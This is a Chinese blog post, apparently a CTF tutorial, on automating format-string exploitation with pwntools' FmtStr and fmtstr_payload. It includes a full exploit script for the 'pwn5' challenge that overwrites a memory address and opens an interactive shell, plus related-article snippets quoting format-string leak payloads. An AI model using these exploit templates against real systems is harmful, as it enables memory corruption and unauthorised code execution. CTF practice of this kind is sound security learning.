[pwn]格式化字符串全自动exp!!!

最新推荐文章于 2022-12-12 13:02:12 发布
最新推荐文章于 2022-12-12 13:02:12 发布
阅读量2.1k 收藏 42
点赞数 9
分类专栏: pwn入门 文章标签: pwn 格式化字符串 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjjcxy_long/article/details/116755976
版权
前言

格式化字符串一把梭真的好爽!!!!!!

再也不用绞尽脑汁去gdb调试多少个字节和几位了!!

呜呜呜,花了一个通宵把这一系列搞定,喜极而泣,特此记录

以前的我做这类题心理状态:
在这里插入图片描述
现在的我:
在这里插入图片描述
总之就是非!常!爽!

这里我用的例题是 [第五空间2019决赛] 里的pwn5,考察到的知识是单纯的格式化字符串。

格式化字符串原理及利用

原理就不赘述啦,详情参考ctfwiki上的内容
或者搜索下,其他很多大佬写的文章都超级棒!!

利用的话,如下:
利用格式化字符串的漏洞,一般会有如下几种操作:

泄露栈内存
    获取某个变量的值
    获取某个变量对应地址的内存
泄露任意地址内存
    利用GOT表得到libc函数地址,进而获取libc,进而获取其它libc函数地址
    盲打,dump整个程序,获取有用信息
pwntools中自带的格式化字符串漏洞函数

做题的时候容易遇到两个问题:

  1. 找不到偏移量是多少,也就是%n$x中的n为多少
  2. 写入指定地址用%n构造字节数要算的很累,而且容易算错

然后!为了解决这两个问题我翻了好久,总算翻到了点好用的!
在这里插入图片描述

一、针对第一个找不到偏移量的问题
	pwntools自带了FmtStr函数,使用方法如下:


def exec_fmt(pad):
	p = process("./fmt")
	# send 还是 sendline以程序为准
	p.send(pad)
	return p.recv()

fmt = FmtStr(exec_fmt)
print("offset ===> ", fmt.offset)
  1. 直接就可以用,需要本地ELF文件(所以这个方法不能盲pwn)
  2. 不用去考虑pad传参传什么,Fmt函数都帮你搞定啦哈哈哈
    然后只用改一下你process里的文件名就好咯
  3. 如果存在格式化字符串漏洞的话就能自动计算偏移出来了!

在这里插入图片描述

二、自动写入指定地址
  • 咳咳,经过刚才的自动爆破我们已经得到了偏移量。
    但!偏移量只是我们实现pwn(砰!)的一个步骤而已
    接下来还需要用这个偏移量实现任意地址写或者任意地址泄露。
    我们平常在%n前面拼凑字节实现改写,但现在有fmtstr_payload

fmtstr_payload是pwntools里面的一个工具,用来简化对格式化字符串漏洞的构造工作。

# 64位格式化漏洞要设置一下上下文环境,32位注释掉这行即可
context.arch = "amd64"

fmtstr_payload(offset, writes, numbwritten=0, write_size="byte")
# 总共四个参数:
# offset --> 偏移量 
# writes --> {被覆盖的地址:要写入的地址} 地址都为int型,也就是不需要使用p32或者p64打包
# numbwritten --> 已经由printf函数写入的字节数,默认为0
# write_size --> 逐byte/short/int写入,默认是byte,这样发送的字节少

fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)
第一个参数表示格式化字符串的偏移,也就是刚才自动算出来的。
第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成
{printfGOT:systemAddress};
第三个参数表示已经输出的字符个数,这里没有,为0,采用默认值即可;
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写。
fmtstr_payload函数返回的就是payload

实战[第五空间pwn5]

这里我放上自动化的题解,也可以当个模板哈哈哈


from pwn import *

host = "192.168.39.97"
port = 10002
dog=remote(host, port)
#dog = process("./fmt")

# 64位格式化漏洞要设置一下上下文环境,否则报错
# context.arch = "amd64"

def exec_fmt(pad):
	p = process("./fmt")
	# send 还是 sendline以程序为准
	p.send(pad)
	return p.recv()

fmt = FmtStr(exec_fmt)
print("offset ===> ", fmt.offset)

pay=fmtstr_payload(fmt.offset, {0x804c044: 0},write_size = "byte",numbwritten = 0)

dog.sendline(pay)

dog.sendline("0")
dog.interactive()

大功告成!每天进步亿点点

在这里插入图片描述

结语

虽然使用工具真的 超 级 快 乐 ,但原理也要弄懂的
也到了该睡的点了哈哈哈哈,晚安,祝大家都好梦!
pwn狗日常任务达成!biubiubiu~

在这里插入图片描述

mid2dog
关注
  • 9
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Server-Auto-Pwn:自动Web服务器漏洞扫描程序和漏洞利用程序
05-09
服务器自动拥有 SAP为漏洞利用程序提供了一个平台,可以轻松创建该漏洞利用程序,并将其与从shellcode到jsp的各种不同有效负载一起使用,几乎可以与任何漏洞利用程序一起使用。 此外,通过多阶段的shell处理程序,它还可以利用被攻击的机器提供可靠的tty shell。
pwnchain:PwnChain是一种以自动化方式级联不同工具的工具
03-31
密码链 简介和目标 PwnChain是一种以自动化方式级联不同工具的工具。 具有指定输入和输出域的模块以树形结构链接以完成特定任务。 该应用程序专为渗透测试序列的自动化而设计。 但是,该应用程序旨在具有足够的灵活性,以用于按顺序处理不同的相互依赖的CLI工具的任何情况。 PwnChain使用.json配置文件来确定应以某种方式执行哪些工具,并使用正则表达式解析工具的输出以用作后续工具的输入。 其目标是易于定制以完成不同的重复任务。 警告 PwnChain按照配置文件的指示执行shell命令。 永远不要使用您不完全了解的配置文件。 用法 PwnChain可以在任何可用Python3的地方执行 python3 pwnchain config 要不就 pwnchain config 如果/usr/bin/env在您的系统上可用。 您可以使用-h或--help选项来显示各种可用的命令行选项
pwn - 格式化字符串攻击
Schwarzer
07-22 2000
前言 日前入门pwn,粗浅学习了写shellcode,rop,栈溢出攻击,后面遇到了fmtstr,把我头搞炸了,决定好好学习一下
正则表达式之(exp),(?:exp),(?=exp) 理解
极客神殿
08-02 7447
先澄清下如下俩个概念: 1、分组(或捕获组) 分组的定义 正则表达式通过使用括号将表达式分为不同的分组,识别的方法是通过从左至右搜寻左半括号,遇到第一个左半括号时,则该左半括号与对应的右半括号所包含的内容即为第一分组,以此类推 。例如,在表达式((A)(B(C))),有四个这样的组:((A)(B(C)))、(A)、(B(C))、(C) 分组存在意义 向后引用:在第i个分组中被匹配...
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 796
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
接上一篇的pwn题,exp解析及pwntools相关使用。
qq_43474199的博客
09-26 1222
from pwn import * from LibcSearcher import * context(log_level='debug') #offset=32 sh=process('./pwn1.bak') elf=ELF('./pwn1.bak') #gdb.attach(sh,'b *0x400e9d') sh.recvuntil("choice:") sh.sendline('1'...
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
pwn入门题目+exp
最新发布
01-26
初级的ROP,附有完整exp,可以学一下
exppwn测试文件
09-12
4. **ret2libc**:此技术依赖于程序使用的C语言标准库(libc),通过溢出漏洞将返回地址设置为libc中的特定地址,例如`system()`函数,然后传递命令字符串的地址,执行任意命令。 5. **ret2csu**:在某些情况下,...
pwn_exp:pwn exps
04-19
"pwn exp"(pwn exploits)是指利用这些编程错误编写的具体攻击代码,用于在安全竞赛、漏洞挖掘或者恶意攻击中获取对目标系统的控制权。这个主题主要涉及到的是黑客技术、逆向工程和安全研究。 在给定的资源"pwn_...
pwn100题目文件及exp.zip
08-09
栈溢出漏洞,没有system函数下需要使用DynELF函数来泄漏函数地址,本资源是利用read和puts函数来进行泄漏
Google Olympic Doodle Score Pwn!-crx插件
04-05
语言:English (United States) 奥林匹克运动会的Google涂鸦正在流行。 但是,并非所有人都能在漂流中创造出那些破纪录的时间,或在超高的航行中… 奥林匹克运动会的Google涂鸦正在流行。 但是并不是每个人都能在漂流...
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 4845
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
CTF PWN 格式化字符串
VisualNull的博客
06-05 1181
CTF PWN格式化字符串
Pwn题目环境自动部署
MrTreebook的博客
03-30 416
Pwn题目环境自动部署1.下载地址2.pwntools_env介绍安装教程使用说明欢迎各路大神指导维护 1.下载地址 gitee 2.pwntools_env 介绍 自动部署pwn题环境 pwntools gdb ROPgadget gdb插件来自gitee,有效避免github连接不上的问题 安装教程 git clone https://gitee.com/liweijun0302/pwntools_env.git cd pwntools_env ./pwntools_env.sh 使用说明 安装
记一次赛题--pwn--没有溢出啦【格式化字符串
qq_73149934的博客
12-12 212
记一次赛题--pwn--没有溢出啦【格式化字符串
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 4508
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
pwntools入门
TedLau的博客
02-05 1874
0x00 前言: pwntools是写exp的得力助手,是pwn题中不可缺少的一部分,学pwn的过程中,对于pwntools的理解是必不可少的,今日我学习了部分pwntools的知识,在此写到博客中,本着分享知识的目的,同时也是为了加深自己的印象。部分知识我也不会,百度上没有特别明确的解释,文章应该不误导读者,故在一些地方我会特别注明。 本文正文中的英文粗体为索要解释的内容,斜体为官方文...
xctf-pwn新手区 【第一题】
mid2dog
09-22 2675
前言 书本知识学的差不多了,是时候不看题解来自己做题了(雾) 正文 攻防世界新手区pwn第一题——level2 下过来附件就一个,没有libc可以连,应该是很适合萌新的 先用虚拟机checksec 看保护,顺便连一下看看 感动,32位小端序,保护只开了一个NX 好像输入什么都会返回123 打开ida反汇编看看 有这么多函数,从main入手 已经有一点汇编基础了,勉强能看懂。 但还是F5查看伪代码看的爽快 双击第一个函数进去看看 这里已经可以看到是一个简单的栈溢出了。因为定义buf是0x88个字
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式化字符串漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串中包含了未经验证的用户输入。攻击者可以通过修改格式字符串中的特殊格式标识符来读取或修改内存中的数据。 为了防止格式化字符串漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全的格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细的信息,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值